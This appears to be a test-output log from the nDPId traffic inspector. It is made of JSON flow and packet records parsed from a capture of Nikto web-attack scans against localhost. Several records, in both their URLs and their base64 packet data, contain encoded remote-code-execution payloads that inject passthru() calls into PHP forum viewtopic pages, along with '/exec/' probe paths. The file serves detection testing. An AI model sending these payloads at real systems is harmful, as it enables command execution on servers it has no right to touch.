+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277736,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/97\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001344)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1576420277737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277737,"pkt":"AAAAAAAAAAAAAAAACABFAADIqydAAEAGkQZ\/AAABfwAAAcamH5BRA5JApfKSEYAYAED+vAAAAQEICp1m\/xGdZv8RR0VUIC9sZXZlbC85OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277737,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/98\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001345)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1576420277739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277739,"pkt":"AAAAAAAAAAAAAAAACABFAADI+OxAAEAGQ0F\/AAABfwAAAcaoH5BlRMHxT\/ad\/4AYAED+vAAAAQEICp1m\/xOdZv8SR0VUIC9sZXZlbC85OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzQ2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1576420277741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277741,"pkt":"AAAAAAAAAAAAAAAACABFAAFdQfFAAEAG+ad\/AAABfwAAAcaqH5DRIHj1tdpDy4AYAED\/UQAAAQEICp1m\/xWdZv8VR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM4OCkNCg0K"} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1576420277743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277743,"pkt":"AAAAAAAAAAAAAAAACABFAAFGAG5AAEAGO0J\/AAABfwAAAcasH5AOKDl4jiUqhYAYAED\/OgAAAQEICp1m\/xedZv8XR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzg5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1576420277745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277745,"pkt":"AAAAAAAAAAAAAAAACABFAAFddiRAAEAGxXR\/AAABfwAAAcauH5DeiE8\/TEH5WoAYAED\/UQAAAQEICp1m\/xmdZv8ZR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1576420277746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277746,"pkt":"AAAAAAAAAAAAAAAACABFAAFmjyxAAEAGrGN\/AAABfwAAAcawH5C1dLY3dpi6dIAYAED\/WgAAAQEICp1m\/xqdZv8aR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1576420277747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277747,"pkt":"AAAAAAAAAAAAAAAACABFAAFrmeBAAEAGoap\/AAABfwAAAcayH5AmkqDEx1CXDIAYAED\/XwAAAQEICp1m\/xudZv8bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1576420277749,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277749,"pkt":"AAAAAAAAAAAAAAAACABFAAFlinpAAEAGsRZ\/AAABfwAAAca0H5BJbLNma4SLi4AYAED\/WQAAAQEICp1m\/x2dZv8dR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1576420277750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277750,"pkt":"AAAAAAAAAAAAAAAACABFAAFjJWNAAEAGFjB\/AAABfwAAAca2H5CBThx9EGPplIAYAED\/VwAAAQEICp1m\/x6dZv8eR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
